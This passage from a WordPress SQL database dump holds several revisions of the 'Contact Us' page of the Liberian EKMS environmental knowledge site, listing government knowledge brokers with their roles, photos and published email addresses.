			<figure>\n											<a data-elementor-open-lightbox=\"\" href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption>J.S. Datuama Cammue</figcaption>\n										</figure>\n							<figure>\n											<a data-elementor-open-lightbox=\"\" href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption>Benjamin Karmorh</figcaption>\n										</figure>\n							<figure>\n											<a data-elementor-open-lightbox=\"\" href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BJ-1-ogrs9wvimfha3qy6qlh3hvheny61c0row4oziv8ha0.jpg\" title=\"Berexford S. Jallah\" alt=\"Berexford S. Jallah\" />								</a>\n											<figcaption>Berexford S. Jallah</figcaption>\n										</figure>\n		<p>MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p>MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p>GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n							<figure>\n											<a data-elementor-open-lightbox=\"\" href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption>John K. Jallah</figcaption>\n										</figure>\n							<figure>\n											<a data-elementor-open-lightbox=\"\" href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"Kawusu Toure\" alt=\"Kawusu Toure\" />								</a>\n											<figcaption>Kawusu Toure</figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p>Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p>Assistant Manager - Compliance and Enforcement, ESIA, EPA\nkawumtoure@gmail.com<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong></p><p>Assistant Director, MOCI</p><p>Division of Foreign Trade</p><p><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p> </p><p><strong>Alphonso Freeman<br /></strong></p><p>Biosafety Officer, MOCI</p><p>National Standard Laboratory</p><p><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p><p><strong>Lasana M. Donzo</strong></p><p>Coordinator for Standards, MOCI</p><p>Bureau of Industrial Services</p><p><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong></p><p>Senior Research Officer, MOCI</p><p>Division of Knowledge Management &amp; Archive</p><p><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2020-10-12 15:37:35','2020-10-12 15:37:35','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3157,42,'2020-10-14 11:12:16','2020-10-14 11:12:16','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h2>EKMS Knowledge Brokers</h2>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a data-elementor-open-lightbox=\"\" href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a data-elementor-open-lightbox=\"\" href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a data-elementor-open-lightbox=\"\" href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BJ-1-ogrs9wvimfha3qy6qlh3hvheny61c0row4oziv8ha0.jpg\" title=\"Berexford S. Jallah\" alt=\"Berexford S. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n							<figure>\n											<a data-elementor-open-lightbox=\"\" href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a data-elementor-open-lightbox=\"\" href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"Kawusu Toure\" alt=\"Kawusu Toure\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p><p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p><p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2020-10-14 11:12:16','2020-10-14 11:12:16','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3160,42,'2020-10-20 10:08:30','2020-10-20 10:08:30','','WIN_20160609_11_17_46_Pro','','inherit','open','closed','','win_20160609_11_17_46_pro','','','2020-10-20 10:08:30','2020-10-20 10:08:30','',80,'https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg',0,'attachment','image/jpeg',0),(3161,42,'2020-10-20 10:09:07','2020-10-20 10:09:07','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h2>EKMS Knowledge Brokers</h2>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a data-elementor-open-lightbox=\"\" href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a data-elementor-open-lightbox=\"\" href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a data-elementor-open-lightbox=\"\" href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BJ-1-ogrs9wvimfha3qy6qlh3hvheny61c0row4oziv8ha0.jpg\" title=\"Berexford S. Jallah\" alt=\"Berexford S. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n							<figure>\n											<a data-elementor-open-lightbox=\"\" href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a data-elementor-open-lightbox=\"\" href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"Kawusu Toure\" alt=\"Kawusu Toure\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p><p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p><p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2020-10-20 10:09:07','2020-10-20 10:09:07','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3164,42,'2020-10-21 10:53:56','2020-10-21 10:53:56','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a data-elementor-open-lightbox=\"\" href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a data-elementor-open-lightbox=\"\" href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a data-elementor-open-lightbox=\"\" href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BJ-1-ogrs9wvimfha3qy6qlh3hvheny61c0row4oziv8ha0.jpg\" title=\"Berexford S. Jallah\" alt=\"Berexford S. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n							<figure>\n											<a data-elementor-open-lightbox=\"\" href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a data-elementor-open-lightbox=\"\" href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"Kawusu Toure\" alt=\"Kawusu Toure\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p><p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p><p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2020-10-21 10:53:56','2020-10-21 10:53:56','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3165,42,'2020-10-21 12:55:35','2020-10-21 12:55:35','','','','inherit','open','closed','','1','','','2021-01-18 14:47:44','2021-01-18 14:47:44','',80,'https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg',0,'attachment','image/jpeg',0);
INSERT INTO `wp_posts` VALUES (3166,42,'2020-10-21 12:56:02','2020-10-21 12:56:02','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a data-elementor-open-lightbox=\"\" href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a data-elementor-open-lightbox=\"\" href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a data-elementor-open-lightbox=\"\" href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BJ-1-ogrs9wvimfha3qy6qlh3hvheny61c0row4oziv8ha0.jpg\" title=\"Berexford S. Jallah\" alt=\"Berexford S. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n							<figure>\n											<a data-elementor-open-lightbox=\"\" href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a data-elementor-open-lightbox=\"\" href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"Kawusu Toure\" alt=\"Kawusu Toure\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p><p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2020/10/1-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2020-10-21 12:56:02','2020-10-21 12:56:02','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3167,42,'2020-10-21 